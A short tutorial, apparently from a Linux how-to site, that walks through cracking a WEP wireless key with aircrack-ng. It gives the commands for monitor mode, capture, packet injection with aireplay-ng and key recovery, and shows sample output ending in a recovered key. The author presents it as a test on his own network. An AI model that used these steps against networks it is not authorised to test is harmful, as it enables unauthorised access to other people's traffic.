This article shortly describes simple steps on how to crack a wireless WEP key using AIR Crack software. This can be done by sniffing a wireless network, capturing encrypted packets and running appropriate encryption cracking program in attempt to decrypt captured data. WEP ( Wired Equivalent Privacy ) is quite easy to crack as it uses only one key to encrypt all traffic. Basic principle is that communication between two nodes on the network is based on the MAC address. Each host receives packets only intended for MAC address of its own interface. The same principle also applies for a wireless networks. However, if one node sets its own network card into promiscuous mode it will also receive packets which are not addressed for its own MAC address.
To crack the WEP key a hacker needs to capture sample packets not intended for his own network interface and run crack program to compare testing keys against WEP key bundled with captured packets in attempt of decryption. The key which fits to decrypt captured packets is the key used by wireless network to encrypt its entire wireless communication with its connected stations.
The guide assumes that your have wireless network card installed and that it supports monitor mode. In this example I'm using Realtek Semiconductor Co., Ltd. RTL-8185 IEEE 802.11a/b/g Wireless LAN Controller.
AIR Crack installation
# apt-get install aircrack-ng
# yum -y install aircrack-ng
Identify wireless network interface
First we need to identify name of our wireless network interface. If your wireless network card is installed correctly an iwconfig command will reveal the name of your wireless network interface:
wlan0 IEEE 802.11 Mode:Monitor Frequency:2.437 GHz Tx-Power=20 dBm
Turn on Monitor mode
# airmon-ng start wlan0
Interface Chipset Driver
wlan0 rtl8180 - [phy0]
(monitor mode enabled on mon0)
Identify a wireless network BSSID
In this guide i'm are going to crack a wireless WEP key of my own network. In this step I need to identify BSSID of the network I'm intending to crack and as well as its channel number:
# airodump-ng wlan0
Information we can retrieve from airodump-ng output:
BSSID : 00:11:95:9F:FD:F4
Station connected to my wireless router is my laptop with wireless network card running Debian lenny. It is important to have at least one station associated with base so we can capture packets from this communication.
Sniffing wireless network
At this stage we can start capturing packets between base and station. The following linux command will start capturing packets. It is recommended to capture at least 5000 packets. Number of packets required depends on WEP key length in use. I have managed to crack WEP key 64 bits long with 10 hex characters with around 6000 captured packets. Number 6 in the following linux command is a channel number of our wireless base station.
# airodump-ng -c 6 -w data-capture wlan0
Injection of packets
Capturing the packets may take some. aireplay-ng will create some traffic so we can capture more packets for a given time. Since we are hacking our own network, browsing internet on my laptop also helps to create some traffic.
# aireplay-ng -3 -b 00:11:95:9F:FD:F4 -h 00:13:02:30:FF:EC wlan0
Crack WEP wireless key
As a last step we crack WEP key by using captured packets and aircrack-ng command. All captured packets are now stored in data-capture-01.cap file.
NOTE: do not stop capturing process as you do not know if current amount of captured packed is satisfactory to crack WEP key.
# aircrack-ng -z data-capture-01.cap
Read 450 packets.
# BSSID ESSID Encryption
1 00:11:95:9F:FD:F4 linuxconfig.org WEP (210 IVs)
2 00:17:3F:65:2E:5A belkin54g None (0.0.0.0)
Index number of target network ?
Aircrack-ng 1.0 rc1
[00:00:13] Tested 485 keys (got 16690 IVs)
KB depth byte(vote)
0 9/ 13 00(20992) 06(20736) 27(20736) 3F(20736) A2(20736)
1 0/ 1 F3(28416) A8(23296) 34(21248) 57(21248) A3(21248)
2 0/ 2 8E(25856) BC(23808) 3F(23040) D2(22784) 69(21504)
3 0/ 5 6E(24320) 35(22528) 5A(22016) 95(22016) B8(22016)
4 3/ 4 98(21504) 7C(20992) 84(20992) E0(20992) F0(20992)
KEY FOUND! [ 3F:F3:8E:6E:98 ]
Decrypted correctly: 100%